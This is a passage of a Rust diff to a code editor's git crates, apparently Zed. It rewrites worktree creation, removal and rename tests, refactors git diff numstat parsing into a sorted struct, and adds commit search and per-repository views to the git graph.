assert!(result[0].is_main); + assert_eq!(result[1].path, PathBuf::from("/home/user/detached")); + assert_eq!(result[1].ref_name, None); + assert_eq!(result[1].sha.as_ref(), "def456"); + assert!(!result[1].is_main); + + // Bare repo entry (included with ref_name: None) let input = "worktree /home/user/bare.git\nHEAD abc123\nbare\n\n\ worktree /home/user/project\nHEAD def456\nbranch refs/heads/main\n\n"; let result = parse_worktrees_from_str(input); - assert_eq!(result.len(), 1); - assert_eq!(result[0].path, PathBuf::from("/home/user/project")); + assert_eq!(result.len(), 2); + assert_eq!(result[0].path, PathBuf::from("/home/user/bare.git")); + assert_eq!(result[0].ref_name, None); + assert!(result[0].is_main); + assert_eq!(result[1].path, PathBuf::from("/home/user/project")); + assert_eq!(result[1].ref_name, Some("refs/heads/main".into())); + assert!(!result[1].is_main); // Extra porcelain lines (locked, prunable) should be ignored let input = "worktree /home/user/project\nHEAD abc123\nbranch refs/heads/main\n\n\ @@ -3891,11 +3995,17 @@ mod tests { let result = parse_worktrees_from_str(input); assert_eq!(result.len(), 3); assert_eq!(result[0].path, PathBuf::from("/home/user/project")); - assert_eq!(result[0].ref_name.as_ref(), "refs/heads/main"); + assert_eq!(result[0].ref_name, Some("refs/heads/main".into())); + assert!(result[0].is_main); assert_eq!(result[1].path, PathBuf::from("/home/user/locked-wt")); - assert_eq!(result[1].ref_name.as_ref(), "refs/heads/locked-branch"); + assert_eq!(result[1].ref_name, Some("refs/heads/locked-branch".into())); + assert!(!result[1].is_main); assert_eq!(result[2].path, PathBuf::from("/home/user/prunable-wt")); - assert_eq!(result[2].ref_name.as_ref(), "refs/heads/prunable-branch"); + assert_eq!( + result[2].ref_name, + Some("refs/heads/prunable-branch".into()) + ); + assert!(!result[2].is_main); // Leading/trailing whitespace on lines should be tolerated let input = @@ -3904,7 +4014,8 @@ mod tests { assert_eq!(result.len(), 1); 
assert_eq!(result[0].path, PathBuf::from("/home/user/project")); assert_eq!(result[0].sha.as_ref(), "abc123"); - assert_eq!(result[0].ref_name.as_ref(), "refs/heads/main"); + assert_eq!(result[0].ref_name, Some("refs/heads/main".into())); + assert!(result[0].is_main); // Windows-style line endings should be handled let input = "worktree /home/user/project\r\nHEAD abc123\r\nbranch refs/heads/main\r\n\r\n"; @@ -3912,89 +4023,80 @@ mod tests { assert_eq!(result.len(), 1); assert_eq!(result[0].path, PathBuf::from("/home/user/project")); assert_eq!(result[0].sha.as_ref(), "abc123"); - assert_eq!(result[0].ref_name.as_ref(), "refs/heads/main"); + assert_eq!(result[0].ref_name, Some("refs/heads/main".into())); + assert!(result[0].is_main); } - const TEST_WORKTREE_DIRECTORIES: &[&str] = - &["../worktrees", ".git/zed-worktrees", "my-worktrees/"]; - #[gpui::test] async fn test_create_and_list_worktrees(cx: &mut TestAppContext) { disable_git_global_config(); cx.executor().allow_parking(); - for worktree_dir_setting in TEST_WORKTREE_DIRECTORIES { - let repo_dir = tempfile::tempdir().unwrap(); - git2::Repository::init(repo_dir.path()).unwrap(); + let temp_dir = tempfile::tempdir().unwrap(); + let repo_dir = temp_dir.path().join("repo"); + let worktrees_dir = temp_dir.path().join("worktrees"); - let repo = RealGitRepository::new( - &repo_dir.path().join(".git"), - None, - Some("git".into()), - cx.executor(), - ) - .unwrap(); + fs::create_dir_all(&repo_dir).unwrap(); + fs::create_dir_all(&worktrees_dir).unwrap(); - // Create an initial commit (required for worktrees) - smol::fs::write(repo_dir.path().join("file.txt"), "content") - .await - .unwrap(); - repo.stage_paths(vec![repo_path("file.txt")], Arc::new(HashMap::default())) - .await - .unwrap(); - repo.commit( - "Initial commit".into(), - None, - CommitOptions::default(), - AskPassDelegate::new(&mut cx.to_async(), |_, _, _| {}), - Arc::new(checkpoint_author_envs()), - ) - .await - .unwrap(); + 
git2::Repository::init(&repo_dir).unwrap(); - // List worktrees — should have just the main one - let worktrees = repo.worktrees().await.unwrap(); - assert_eq!(worktrees.len(), 1); - assert_eq!( - worktrees[0].path.canonicalize().unwrap(), - repo_dir.path().canonicalize().unwrap() - ); + let repo = RealGitRepository::new( + &repo_dir.join(".git"), + None, + Some("git".into()), + cx.executor(), + ) + .unwrap(); - // Create a new worktree - repo.create_worktree( - "test-branch".to_string(), - resolve_worktree_directory(repo_dir.path(), worktree_dir_setting), - Some("HEAD".to_string()), - ) + // Create an initial commit (required for worktrees) + smol::fs::write(repo_dir.join("file.txt"), "content") .await .unwrap(); + repo.stage_paths(vec![repo_path("file.txt")], Arc::new(HashMap::default())) + .await + .unwrap(); + repo.commit( + "Initial commit".into(), + None, + CommitOptions::default(), + AskPassDelegate::new(&mut cx.to_async(), |_, _, _| {}), + Arc::new(checkpoint_author_envs()), + ) + .await + .unwrap(); - // List worktrees — should have two - let worktrees = repo.worktrees().await.unwrap(); - assert_eq!(worktrees.len(), 2); - - let expected_path = - worktree_path_for_branch(repo_dir.path(), worktree_dir_setting, "test-branch"); - let new_worktree = worktrees - .iter() - .find(|w| w.branch() == "test-branch") - .expect("should find worktree with test-branch"); - assert_eq!( - new_worktree.path.canonicalize().unwrap(), - expected_path.canonicalize().unwrap(), - "failed for worktree_directory setting: {worktree_dir_setting:?}" - ); + // List worktrees — should have just the main one + let worktrees = repo.worktrees().await.unwrap(); + assert_eq!(worktrees.len(), 1); + assert_eq!( + worktrees[0].path.canonicalize().unwrap(), + repo_dir.canonicalize().unwrap() + ); - // Clean up so the next iteration starts fresh - repo.remove_worktree(expected_path, true).await.unwrap(); + let worktree_path = worktrees_dir.join("some-worktree"); - // Clean up the worktree base 
directory if it was created outside repo_dir - // (e.g. for the "../worktrees" setting, it won't be inside the TempDir) - let resolved_dir = resolve_worktree_directory(repo_dir.path(), worktree_dir_setting); - if !resolved_dir.starts_with(repo_dir.path()) { - let _ = std::fs::remove_dir_all(&resolved_dir); - } - } + // Create a new worktree + repo.create_worktree( + Some("test-branch".to_string()), + worktree_path.clone(), + Some("HEAD".to_string()), + ) + .await + .unwrap(); + + // List worktrees — should have two + let worktrees = repo.worktrees().await.unwrap(); + assert_eq!(worktrees.len(), 2); + + let new_worktree = worktrees + .iter() + .find(|w| w.display_name() == "test-branch") + .expect("should find worktree with test-branch"); + assert_eq!( + new_worktree.path.canonicalize().unwrap(), + worktree_path.canonicalize().unwrap(), + ); } #[gpui::test] @@ -4002,147 +4104,92 @@ mod tests { disable_git_global_config(); cx.executor().allow_parking(); - for worktree_dir_setting in TEST_WORKTREE_DIRECTORIES { - let repo_dir = tempfile::tempdir().unwrap(); - git2::Repository::init(repo_dir.path()).unwrap(); + let temp_dir = tempfile::tempdir().unwrap(); + let repo_dir = temp_dir.path().join("repo"); + let worktrees_dir = temp_dir.path().join("worktrees"); + git2::Repository::init(&repo_dir).unwrap(); - let repo = RealGitRepository::new( - &repo_dir.path().join(".git"), - None, - Some("git".into()), - cx.executor(), - ) - .unwrap(); + let repo = RealGitRepository::new( + &repo_dir.join(".git"), + None, + Some("git".into()), + cx.executor(), + ) + .unwrap(); - // Create an initial commit - smol::fs::write(repo_dir.path().join("file.txt"), "content") - .await - .unwrap(); - repo.stage_paths(vec![repo_path("file.txt")], Arc::new(HashMap::default())) - .await - .unwrap(); - repo.commit( - "Initial commit".into(), - None, - CommitOptions::default(), - AskPassDelegate::new(&mut cx.to_async(), |_, _, _| {}), - Arc::new(checkpoint_author_envs()), - ) + // Create an initial 
commit + smol::fs::write(repo_dir.join("file.txt"), "content") .await .unwrap(); - - // Create a worktree - repo.create_worktree( - "to-remove".to_string(), - resolve_worktree_directory(repo_dir.path(), worktree_dir_setting), - Some("HEAD".to_string()), - ) + repo.stage_paths(vec![repo_path("file.txt")], Arc::new(HashMap::default())) .await .unwrap(); + repo.commit( + "Initial commit".into(), + None, + CommitOptions::default(), + AskPassDelegate::new(&mut cx.to_async(), |_, _, _| {}), + Arc::new(checkpoint_author_envs()), + ) + .await + .unwrap(); - let worktree_path = - worktree_path_for_branch(repo_dir.path(), worktree_dir_setting, "to-remove"); - assert!(worktree_path.exists()); - - // Remove the worktree - repo.remove_worktree(worktree_path.clone(), false) - .await - .unwrap(); - - // Verify it's gone from the list - let worktrees = repo.worktrees().await.unwrap(); - assert_eq!(worktrees.len(), 1); - assert!( - worktrees.iter().all(|w| w.branch() != "to-remove"), - "removed worktree should not appear in list" - ); - - // Verify the directory is removed - assert!(!worktree_path.exists()); - - // Clean up the worktree base directory if it was created outside repo_dir - // (e.g. 
for the "../worktrees" setting, it won't be inside the TempDir) - let resolved_dir = resolve_worktree_directory(repo_dir.path(), worktree_dir_setting); - if !resolved_dir.starts_with(repo_dir.path()) { - let _ = std::fs::remove_dir_all(&resolved_dir); - } - } - } + // Create a worktree + let worktree_path = worktrees_dir.join("worktree-to-remove"); + repo.create_worktree( + Some("to-remove".to_string()), + worktree_path.clone(), + Some("HEAD".to_string()), + ) + .await + .unwrap(); - #[gpui::test] - async fn test_remove_worktree_force(cx: &mut TestAppContext) { - disable_git_global_config(); - cx.executor().allow_parking(); + // Remove the worktree + repo.remove_worktree(worktree_path.clone(), false) + .await + .unwrap(); - for worktree_dir_setting in TEST_WORKTREE_DIRECTORIES { - let repo_dir = tempfile::tempdir().unwrap(); - git2::Repository::init(repo_dir.path()).unwrap(); + // Verify the directory is removed + let worktrees = repo.worktrees().await.unwrap(); + assert_eq!(worktrees.len(), 1); + assert!( + worktrees.iter().all(|w| w.display_name() != "to-remove"), + "removed worktree should not appear in list" + ); + assert!(!worktree_path.exists()); + + // Create a worktree + let worktree_path = worktrees_dir.join("dirty-wt"); + repo.create_worktree( + Some("dirty-wt".to_string()), + worktree_path.clone(), + Some("HEAD".to_string()), + ) + .await + .unwrap(); - let repo = RealGitRepository::new( - &repo_dir.path().join(".git"), - None, - Some("git".into()), - cx.executor(), - ) - .unwrap(); + assert!(worktree_path.exists()); - // Create an initial commit - smol::fs::write(repo_dir.path().join("file.txt"), "content") - .await - .unwrap(); - repo.stage_paths(vec![repo_path("file.txt")], Arc::new(HashMap::default())) - .await - .unwrap(); - repo.commit( - "Initial commit".into(), - None, - CommitOptions::default(), - AskPassDelegate::new(&mut cx.to_async(), |_, _, _| {}), - Arc::new(checkpoint_author_envs()), - ) + // Add uncommitted changes in the worktree + 
smol::fs::write(worktree_path.join("dirty-file.txt"), "uncommitted") .await .unwrap(); - // Create a worktree - repo.create_worktree( - "dirty-wt".to_string(), - resolve_worktree_directory(repo_dir.path(), worktree_dir_setting), - Some("HEAD".to_string()), - ) + // Non-force removal should fail with dirty worktree + let result = repo.remove_worktree(worktree_path.clone(), false).await; + assert!( + result.is_err(), + "non-force removal of dirty worktree should fail" + ); + + // Force removal should succeed + repo.remove_worktree(worktree_path.clone(), true) .await .unwrap(); - let worktree_path = - worktree_path_for_branch(repo_dir.path(), worktree_dir_setting, "dirty-wt"); - - // Add uncommitted changes in the worktree - smol::fs::write(worktree_path.join("dirty-file.txt"), "uncommitted") - .await - .unwrap(); - - // Non-force removal should fail with dirty worktree - let result = repo.remove_worktree(worktree_path.clone(), false).await; - assert!( - result.is_err(), - "non-force removal of dirty worktree should fail" - ); - - // Force removal should succeed - repo.remove_worktree(worktree_path.clone(), true) - .await - .unwrap(); - - let worktrees = repo.worktrees().await.unwrap(); - assert_eq!(worktrees.len(), 1); - assert!(!worktree_path.exists()); - - // Clean up the worktree base directory if it was created outside repo_dir - // (e.g. 
for the "../worktrees" setting, it won't be inside the TempDir) - let resolved_dir = resolve_worktree_directory(repo_dir.path(), worktree_dir_setting); - if !resolved_dir.starts_with(repo_dir.path()) { - let _ = std::fs::remove_dir_all(&resolved_dir); - } - } + let worktrees = repo.worktrees().await.unwrap(); + assert_eq!(worktrees.len(), 1); + assert!(!worktree_path.exists()); } #[gpui::test] @@ -4150,206 +4197,97 @@ mod tests { disable_git_global_config(); cx.executor().allow_parking(); - for worktree_dir_setting in TEST_WORKTREE_DIRECTORIES { - let repo_dir = tempfile::tempdir().unwrap(); - git2::Repository::init(repo_dir.path()).unwrap(); + let temp_dir = tempfile::tempdir().unwrap(); + let repo_dir = temp_dir.path().join("repo"); + let worktrees_dir = temp_dir.path().join("worktrees"); - let repo = RealGitRepository::new( - &repo_dir.path().join(".git"), - None, - Some("git".into()), - cx.executor(), - ) - .unwrap(); + git2::Repository::init(&repo_dir).unwrap(); - // Create an initial commit - smol::fs::write(repo_dir.path().join("file.txt"), "content") - .await - .unwrap(); - repo.stage_paths(vec![repo_path("file.txt")], Arc::new(HashMap::default())) - .await - .unwrap(); - repo.commit( - "Initial commit".into(), - None, - CommitOptions::default(), - AskPassDelegate::new(&mut cx.to_async(), |_, _, _| {}), - Arc::new(checkpoint_author_envs()), - ) + let repo = RealGitRepository::new( + &repo_dir.join(".git"), + None, + Some("git".into()), + cx.executor(), + ) + .unwrap(); + + // Create an initial commit + smol::fs::write(repo_dir.join("file.txt"), "content") .await .unwrap(); - - // Create a worktree - repo.create_worktree( - "old-name".to_string(), - resolve_worktree_directory(repo_dir.path(), worktree_dir_setting), - Some("HEAD".to_string()), - ) + repo.stage_paths(vec![repo_path("file.txt")], Arc::new(HashMap::default())) .await .unwrap(); + repo.commit( + "Initial commit".into(), + None, + CommitOptions::default(), + AskPassDelegate::new(&mut 
cx.to_async(), |_, _, _| {}), + Arc::new(checkpoint_author_envs()), + ) + .await + .unwrap(); - let old_path = - worktree_path_for_branch(repo_dir.path(), worktree_dir_setting, "old-name"); - assert!(old_path.exists()); - - // Move the worktree to a new path - let new_path = - resolve_worktree_directory(repo_dir.path(), worktree_dir_setting).join("new-name"); - repo.rename_worktree(old_path.clone(), new_path.clone()) - .await - .unwrap(); - - // Verify the old path is gone and new path exists - assert!(!old_path.exists()); - assert!(new_path.exists()); - - // Verify it shows up in worktree list at the new path - let worktrees = repo.worktrees().await.unwrap(); - assert_eq!(worktrees.len(), 2); - let moved_worktree = worktrees - .iter() - .find(|w| w.branch() == "old-name") - .expect("should find worktree by branch name"); - assert_eq!( - moved_worktree.path.canonicalize().unwrap(), - new_path.canonicalize().unwrap() - ); - - // Clean up so the next iteration starts fresh - repo.remove_worktree(new_path, true).await.unwrap(); - - // Clean up the worktree base directory if it was created outside repo_dir - // (e.g. 
for the "../worktrees" setting, it won't be inside the TempDir) - let resolved_dir = resolve_worktree_directory(repo_dir.path(), worktree_dir_setting); - if !resolved_dir.starts_with(repo_dir.path()) { - let _ = std::fs::remove_dir_all(&resolved_dir); - } - } - } - - #[test] - fn test_resolve_worktree_directory() { - let work_dir = Path::new("/code/my-project"); - - // Sibling directory — outside project, so repo dir name is appended - assert_eq!( - resolve_worktree_directory(work_dir, "../worktrees"), - PathBuf::from("/code/worktrees/my-project") - ); - - // Git subdir — inside project, no repo name appended - assert_eq!( - resolve_worktree_directory(work_dir, ".git/zed-worktrees"), - PathBuf::from("/code/my-project/.git/zed-worktrees") - ); - - // Simple subdir — inside project, no repo name appended - assert_eq!( - resolve_worktree_directory(work_dir, "my-worktrees"), - PathBuf::from("/code/my-project/my-worktrees") - ); - - // Trailing slash is stripped - assert_eq!( - resolve_worktree_directory(work_dir, "../worktrees/"), - PathBuf::from("/code/worktrees/my-project") - ); - assert_eq!( - resolve_worktree_directory(work_dir, "my-worktrees/"), - PathBuf::from("/code/my-project/my-worktrees") - ); + // Create a worktree + let old_path = worktrees_dir.join("old-worktree-name"); + repo.create_worktree( + Some("old-name".to_string()), + old_path.clone(), + Some("HEAD".to_string()), + ) + .await + .unwrap(); - // Multiple trailing slashes - assert_eq!( - resolve_worktree_directory(work_dir, "foo///"), - PathBuf::from("/code/my-project/foo") - ); + assert!(old_path.exists()); - // Trailing backslashes (Windows-style) - assert_eq!( - resolve_worktree_directory(work_dir, "my-worktrees\\"), - PathBuf::from("/code/my-project/my-worktrees") - ); - assert_eq!( - resolve_worktree_directory(work_dir, "foo\\/\\"), - PathBuf::from("/code/my-project/foo") - ); + // Move the worktree to a new path + let new_path = worktrees_dir.join("new-worktree-name"); + 
repo.rename_worktree(old_path.clone(), new_path.clone()) + .await + .unwrap(); - // Empty string resolves to the working directory itself (inside) - assert_eq!( - resolve_worktree_directory(work_dir, ""), - PathBuf::from("/code/my-project") - ); + // Verify the old path is gone and new path exists + assert!(!old_path.exists()); + assert!(new_path.exists()); - // Just ".." — outside project, repo dir name appended + // Verify it shows up in worktree list at the new path + let worktrees = repo.worktrees().await.unwrap(); + assert_eq!(worktrees.len(), 2); + let moved_worktree = worktrees + .iter() + .find(|w| w.display_name() == "old-name") + .expect("should find worktree by branch name"); assert_eq!( - resolve_worktree_directory(work_dir, ".."), - PathBuf::from("/code/my-project") + moved_worktree.path.canonicalize().unwrap(), + new_path.canonicalize().unwrap() ); } #[test] - fn test_validate_worktree_directory() { - let work_dir = Path::new("/code/my-project"); - - // Valid: sibling - assert!(validate_worktree_directory(work_dir, "../worktrees").is_ok()); - - // Valid: subdirectory - assert!(validate_worktree_directory(work_dir, ".git/zed-worktrees").is_ok()); - assert!(validate_worktree_directory(work_dir, "my-worktrees").is_ok()); - - // Invalid: just ".." would resolve back to the working directory itself - let err = validate_worktree_directory(work_dir, "..").unwrap_err(); - assert!(err.to_string().contains("must not be \"..\"")); - - // Invalid: ".." 
with trailing separators - let err = validate_worktree_directory(work_dir, "..\\").unwrap_err(); - assert!(err.to_string().contains("must not be \"..\"")); - let err = validate_worktree_directory(work_dir, "../").unwrap_err(); - assert!(err.to_string().contains("must not be \"..\"")); - - // Invalid: empty string would resolve to the working directory itself - let err = validate_worktree_directory(work_dir, "").unwrap_err(); - assert!(err.to_string().contains("must not be empty")); - - // Invalid: absolute path - let err = validate_worktree_directory(work_dir, "/tmp/worktrees").unwrap_err(); - assert!(err.to_string().contains("relative path")); - - // Invalid: "/" is absolute on Unix - let err = validate_worktree_directory(work_dir, "/").unwrap_err(); - assert!(err.to_string().contains("relative path")); - - // Invalid: "///" is absolute - let err = validate_worktree_directory(work_dir, "///").unwrap_err(); - assert!(err.to_string().contains("relative path")); - - // Invalid: escapes too far up - let err = validate_worktree_directory(work_dir, "../../other-project/wt").unwrap_err(); - assert!(err.to_string().contains("outside")); - } - - #[test] - fn test_worktree_path_for_branch() { - let work_dir = Path::new("/code/my-project"); + fn test_original_repo_path_from_common_dir() { + // Normal repo: common_dir is /.git + assert_eq!( + original_repo_path_from_common_dir(Path::new("/code/zed5/.git")), + PathBuf::from("/code/zed5") + ); - // Outside project — repo dir name is part of the resolved directory + // Worktree: common_dir is the main repo's .git + // (same result — that's the point, it always traces back to the original) assert_eq!( - worktree_path_for_branch(work_dir, "../worktrees", "feature/foo"), - PathBuf::from("/code/worktrees/my-project/feature/foo") + original_repo_path_from_common_dir(Path::new("/code/zed5/.git")), + PathBuf::from("/code/zed5") ); - // Inside project — no repo dir name inserted + // Bare repo: no .git suffix, returns as-is assert_eq!( 
- worktree_path_for_branch(work_dir, ".git/zed-worktrees", "my-branch"), - PathBuf::from("/code/my-project/.git/zed-worktrees/my-branch") + original_repo_path_from_common_dir(Path::new("/code/zed5.git")), + PathBuf::from("/code/zed5.git") ); - // Trailing slash on setting (inside project) + // Root-level .git directory assert_eq!( - worktree_path_for_branch(work_dir, "my-worktrees/", "branch"), - PathBuf::from("/code/my-project/my-worktrees/branch") + original_repo_path_from_common_dir(Path::new("/.git")), + PathBuf::from("/") ); } @@ -4357,13 +4295,20 @@ mod tests { /// Force a Git garbage collection on the repository. fn gc(&self) -> BoxFuture<'_, Result<()>> { let working_directory = self.working_directory(); + let git_directory = self.path(); let git_binary_path = self.any_git_binary_path.clone(); let executor = self.executor.clone(); self.executor .spawn(async move { let git_binary_path = git_binary_path.clone(); let working_directory = working_directory?; - let git = GitBinary::new(git_binary_path, working_directory, executor); + let git = GitBinary::new( + git_binary_path, + working_directory, + git_directory, + executor, + true, + ); git.run(&["gc", "--prune"]).await?; Ok(()) }) diff --git a/crates/git/src/status.rs b/crates/git/src/status.rs index b20919e7ecf4748d0035a003ed5eadebae752dd7..e8b5caec505f7bf65cb4f5cd7d789207ccd8784f 100644 --- a/crates/git/src/status.rs +++ b/crates/git/src/status.rs @@ -586,13 +586,18 @@ pub struct DiffStat { pub deleted: u32, } +#[derive(Clone, Debug)] +pub struct GitDiffStat { + pub entries: Arc<[(RepoPath, DiffStat)]>, +} + /// Parses the output of `git diff --numstat` where output looks like: /// /// ```text /// 24 12 dir/file.txt /// ``` -pub fn parse_numstat(output: &str) -> HashMap { - let mut stats = HashMap::default(); +pub fn parse_numstat(output: &str) -> GitDiffStat { + let mut entries = Vec::new(); for line in output.lines() { let line = line.trim(); if line.is_empty() { @@ -613,10 +618,14 @@ pub fn 
parse_numstat(output: &str) -> HashMap { let Ok(path) = RepoPath::new(path_str) else { continue; }; - let stat = DiffStat { added, deleted }; - stats.insert(path, stat); + entries.push((path, DiffStat { added, deleted })); + } + entries.sort_by(|(a, _), (b, _)| a.cmp(b)); + entries.dedup_by(|(a, _), (b, _)| a == b); + + GitDiffStat { + entries: entries.into(), } - stats } #[cfg(test)] @@ -629,20 +638,25 @@ mod tests { use super::{DiffStat, parse_numstat}; + fn lookup<'a>(entries: &'a [(RepoPath, DiffStat)], path: &str) -> Option<&'a DiffStat> { + let path = RepoPath::new(path).unwrap(); + entries.iter().find(|(p, _)| p == &path).map(|(_, s)| s) + } + #[test] fn test_parse_numstat_normal() { let input = "10\t5\tsrc/main.rs\n3\t1\tREADME.md\n"; let result = parse_numstat(input); - assert_eq!(result.len(), 2); + assert_eq!(result.entries.len(), 2); assert_eq!( - result.get(&RepoPath::new("src/main.rs").unwrap()), + lookup(&result.entries, "src/main.rs"), Some(&DiffStat { added: 10, deleted: 5 }) ); assert_eq!( - result.get(&RepoPath::new("README.md").unwrap()), + lookup(&result.entries, "README.md"), Some(&DiffStat { added: 3, deleted: 1 @@ -655,10 +669,10 @@ mod tests { // git diff --numstat outputs "-\t-\tpath" for binary files let input = "-\t-\timage.png\n5\t2\tsrc/lib.rs\n"; let result = parse_numstat(input); - assert_eq!(result.len(), 1); - assert!(!result.contains_key(&RepoPath::new("image.png").unwrap())); + assert_eq!(result.entries.len(), 1); + assert!(lookup(&result.entries, "image.png").is_none()); assert_eq!( - result.get(&RepoPath::new("src/lib.rs").unwrap()), + lookup(&result.entries, "src/lib.rs"), Some(&DiffStat { added: 5, deleted: 2 @@ -668,18 +682,18 @@ mod tests { #[test] fn test_parse_numstat_empty_input() { - assert!(parse_numstat("").is_empty()); - assert!(parse_numstat("\n\n").is_empty()); - assert!(parse_numstat(" \n \n").is_empty()); + assert!(parse_numstat("").entries.is_empty()); + assert!(parse_numstat("\n\n").entries.is_empty()); + 
assert!(parse_numstat(" \n \n").entries.is_empty()); } #[test] fn test_parse_numstat_malformed_lines_skipped() { let input = "not_a_number\t5\tfile.rs\n10\t5\tvalid.rs\n"; let result = parse_numstat(input); - assert_eq!(result.len(), 1); + assert_eq!(result.entries.len(), 1); assert_eq!( - result.get(&RepoPath::new("valid.rs").unwrap()), + lookup(&result.entries, "valid.rs"), Some(&DiffStat { added: 10, deleted: 5 @@ -692,9 +706,9 @@ mod tests { // Lines with fewer than 3 tab-separated fields are skipped let input = "10\t5\n7\t3\tok.rs\n"; let result = parse_numstat(input); - assert_eq!(result.len(), 1); + assert_eq!(result.entries.len(), 1); assert_eq!( - result.get(&RepoPath::new("ok.rs").unwrap()), + lookup(&result.entries, "ok.rs"), Some(&DiffStat { added: 7, deleted: 3 @@ -707,7 +721,7 @@ mod tests { let input = "0\t0\tunchanged_but_present.rs\n"; let result = parse_numstat(input); assert_eq!( - result.get(&RepoPath::new("unchanged_but_present.rs").unwrap()), + lookup(&result.entries, "unchanged_but_present.rs"), Some(&DiffStat { added: 0, deleted: 0 diff --git a/crates/git_graph/Cargo.toml b/crates/git_graph/Cargo.toml index 4be3d8149baeab9c285e6c9effa61a10b86cec27..e9e31a8361e367275c994e125ae6e04cbd652fc3 100644 --- a/crates/git_graph/Cargo.toml +++ b/crates/git_graph/Cargo.toml @@ -16,6 +16,7 @@ default = [] test-support = [ "project/test-support", "gpui/test-support", + "remote_connection/test-support", ] [dependencies] @@ -23,16 +24,18 @@ anyhow.workspace = true collections.workspace = true db.workspace = true editor.workspace = true -feature_flags.workspace = true git.workspace = true git_ui.workspace = true gpui.workspace = true language.workspace = true menu.workspace = true project.workspace = true +search.workspace = true settings.workspace = true smallvec.workspace = true +smol.workspace = true theme.workspace = true +theme_settings.workspace = true time.workspace = true ui.workspace = true workspace.workspace = true @@ -44,7 +47,7 @@ git = { 
workspace = true, features = ["test-support"] } gpui = { workspace = true, features = ["test-support"] } project = { workspace = true, features = ["test-support"] } rand.workspace = true -recent_projects = { workspace = true, features = ["test-support"] } +remote_connection = { workspace = true, features = ["test-support"] } serde_json.workspace = true settings = { workspace = true, features = ["test-support"] } workspace = { workspace = true, features = ["test-support"] } diff --git a/crates/git_graph/src/git_graph.rs b/crates/git_graph/src/git_graph.rs index c7235f9112904c1ab463fd7fd7942bfa26079f0f..d2dfda592753e0259c150cab7cce142cdab0851c 100644 --- a/crates/git_graph/src/git_graph.rs +++ b/crates/git_graph/src/git_graph.rs @@ -1,49 +1,57 @@ -use collections::{BTreeMap, HashMap}; +use collections::{BTreeMap, HashMap, IndexSet}; use editor::Editor; -use feature_flags::{FeatureFlagAppExt as _, GitGraphFeatureFlag}; use git::{ BuildCommitPermalinkParams, GitHostingProviderRegistry, GitRemote, Oid, ParsedGitRemote, parse_git_remote_url, - repository::{CommitDiff, CommitFile, InitialGraphCommitData, LogOrder, LogSource, RepoPath}, + repository::{ + CommitDiff, CommitFile, InitialGraphCommitData, LogOrder, LogSource, RepoPath, + SearchCommitArgs, + }, status::{FileStatus, StatusCode, TrackedStatus}, }; use git_ui::{commit_tooltip::CommitAvatar, commit_view::CommitView, git_status_icon}; use gpui::{ AnyElement, App, Bounds, ClickEvent, ClipboardItem, Corner, DefiniteLength, DragMoveEvent, ElementId, Empty, Entity, EventEmitter, FocusHandle, Focusable, Hsla, PathBuilder, Pixels, - Point, ScrollStrategy, ScrollWheelEvent, SharedString, Subscription, Task, + Point, ScrollStrategy, ScrollWheelEvent, SharedString, Subscription, Task, TextStyleRefinement, UniformListScrollHandle, WeakEntity, Window, actions, anchored, deferred, point, prelude::*, px, uniform_list, }; use language::line_diff; -use menu::{Cancel, SelectNext, SelectPrevious}; +use menu::{Cancel, SelectFirst, 
SelectLast, SelectNext, SelectPrevious}; use project::{ - Project, ProjectPath, + ProjectPath, git_store::{ - CommitDataState, GitGraphEvent, GitStoreEvent, GraphDataResponse, Repository, + CommitDataState, GitGraphEvent, GitStore, GitStoreEvent, GraphDataResponse, Repository, RepositoryEvent, RepositoryId, }, }; +use search::{ + SearchOption, SearchOptions, SearchSource, SelectNextMatch, SelectPreviousMatch, + ToggleCaseSensitive, buffer_search, +}; use settings::Settings; use smallvec::{SmallVec, smallvec}; use std::{ cell::Cell, ops::Range, rc::Rc, - sync::Arc, - sync::OnceLock, + sync::{Arc, OnceLock}, time::{Duration, Instant}, }; -use theme::{AccentColors, ThemeSettings}; +use theme::AccentColors; +use theme_settings::ThemeSettings; use time::{OffsetDateTime, UtcOffset, format_description::BorrowedFormatItem}; use ui::{ - ButtonLike, Chip, CommonAnimationExt as _, ContextMenu, DiffStat, Divider, ScrollableHandle, - Table, TableColumnWidths, TableInteractionState, TableResizeBehavior, Tooltip, WithScrollbar, - prelude::*, + ButtonLike, Chip, ColumnWidthConfig, CommonAnimationExt as _, ContextMenu, DiffStat, Divider, + HeaderResizeInfo, HighlightedLabel, RedistributableColumnsState, ScrollableHandle, Table, + TableInteractionState, TableRenderContext, TableResizeBehavior, Tooltip, WithScrollbar, + bind_redistributable_columns, prelude::*, render_redistributable_columns_resize_handles, + render_table_header, table_row::TableRow, }; use workspace::{ Workspace, - item::{Item, ItemEvent, SerializableItem, TabTooltipContent}, + item::{Item, ItemEvent, TabTooltipContent}, }; const COMMIT_CIRCLE_RADIUS: Pixels = px(3.5); @@ -198,6 +206,29 @@ impl ChangedFileEntry { } } +enum QueryState { + Pending(SharedString), + Confirmed((SharedString, Task<()>)), + Empty, +} + +impl QueryState { + fn next_state(&mut self) { + match self { + Self::Confirmed((query, _)) => *self = Self::Pending(std::mem::take(query)), + _ => {} + }; + } +} + +struct SearchState { + case_sensitive: 
bool, + editor: Entity, + state: QueryState, + pub matches: IndexSet, + pub selected_index: Option, +} + pub struct SplitState { left_ratio: f32, visible_left_ratio: f32, @@ -247,6 +278,8 @@ actions!( [ /// Opens the commit view for the selected commit. OpenCommitView, + /// Focuses the search field. + FocusSearch, ] ); @@ -710,8 +743,7 @@ pub fn init(cx: &mut App) { .cloned(); div.when( - workspace.project().read(cx).active_repository(cx).is_some() - && cx.has_flag::(), + workspace.project().read(cx).active_repository(cx).is_some(), |div| { let workspace = workspace.weak_handle(); @@ -720,16 +752,33 @@ pub fn init(cx: &mut App) { move |_: &git_ui::git_panel::Open, window, cx| { workspace .update(cx, |workspace, cx| { - let existing = workspace.items_of_type::(cx).next(); + let Some(repo) = + workspace.project().read(cx).active_repository(cx) + else { + return; + }; + let selected_repo_id = repo.read(cx).id; + + let existing = workspace + .items_of_type::(cx) + .find(|graph| graph.read(cx).repo_id == selected_repo_id); if let Some(existing) = existing { workspace.activate_item(&existing, true, true, window, cx); return; } - let project = workspace.project().clone(); + let git_store = + workspace.project().read(cx).git_store().clone(); let workspace_handle = workspace.weak_handle(); let git_graph = cx.new(|cx| { - GitGraph::new(project, workspace_handle, None, window, cx) + GitGraph::new( + selected_repo_id, + git_store, + workspace_handle, + None, + window, + cx, + ) }); workspace.add_item_to_active_pane( Box::new(git_graph), @@ -747,26 +796,37 @@ pub fn init(cx: &mut App) { let sha = action.sha.clone(); workspace .update(cx, |workspace, cx| { - let existing = 